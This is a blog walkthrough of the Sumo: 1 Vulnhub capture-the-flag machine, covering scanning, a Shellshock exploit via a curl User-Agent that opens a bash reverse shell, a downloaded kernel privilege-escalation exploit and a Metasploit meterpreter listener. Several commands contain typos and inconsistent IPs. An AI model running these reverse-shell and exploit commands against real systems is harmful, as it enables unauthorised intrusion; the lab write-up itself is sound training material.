Sumo Vulnhub Walkthrough

| Sumo: 1 Walkthrough Vulnhub |

In this Article, we play another vulnhub box sumo is created by SunCSR Team. This VM is Beginner level you can download here sumo: 1 CTF

Goal

Get the root shell i.e.([email protected]:~#) and then obtain flag under /root).

Network Scanning

First we discover our target IP address using the netdiscover tool.

netdiscover
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

Now we have our target IP address our next step is scanning target machine ports and service using nmap ( -A ) aggressive scan

nmap -A 192.168.43.233
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

Enumeration

Our target two ports are open 22SSH, and an 80http service running for enumeration we will navigate to a web browser for exploring HTTP service

http://192.168.43.233

now we have no clue what we do then we chose nikto web vulnerability scanner

nikto --url http://192.168.43.223/

After completing the Nikto scan we found a directory /cgi-bin/test and this directory is vulnerable to the shellshock exploit before execute the curl command first we start our netcat listener

curl -v -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/192.168.43.103/4545" 0>&1' "  
http://192.168.43.233/cgi-bin/test/test.cgi
nc -lvp 4545
id
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

After execute the curl command we have reverse shell target machine and we try to find suid binary but we fail then we run the uname -r command and this command is shown target machine kernel version

and this kernel version is vulnerable perf_swevent_init’ Local Privilege Escalation move the /tmp directory and download the exploit

uname -r
wget http://192.168.43.103/k_exploit.c
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

then we compile the exploit but we see a error for compiling time gcc: error trying to exec ‘cc1’ : execvp:

chmod 777 kernal.c
gcc kernal.c -02 -o hackNos

now we have a big problem after compile the exploit our VM is crash again we create an Linux meterpreter reverse payload and using the wget command download this payload target machine /tmp directory

and run the msfconsole and load a plugin multi/handler set Linux meterpreter payload listener

msfconsole -x "use exploit/multi/handler"
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.43.103
set lport 4444
run

our Metasploit listener is start we add permission our payload then execute our payload using the command

chmod +x paylod.elf && ./payload
shell
python -c 'import pty;pty.spawn("/bin/bash")'
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

again we go to the /tmp directory and recompile the exploit and add permission read,write,execute for all user and run exploit

gcc kernal.c -02 -o hackNos
chmod 777 hackNos && ./hackNos 0

our exploit is run successfully and we get root shell target machine so let’s move the /root directory and read our root.txt flag.

cd /root
ls
cat root.txt
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub
Katana 1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →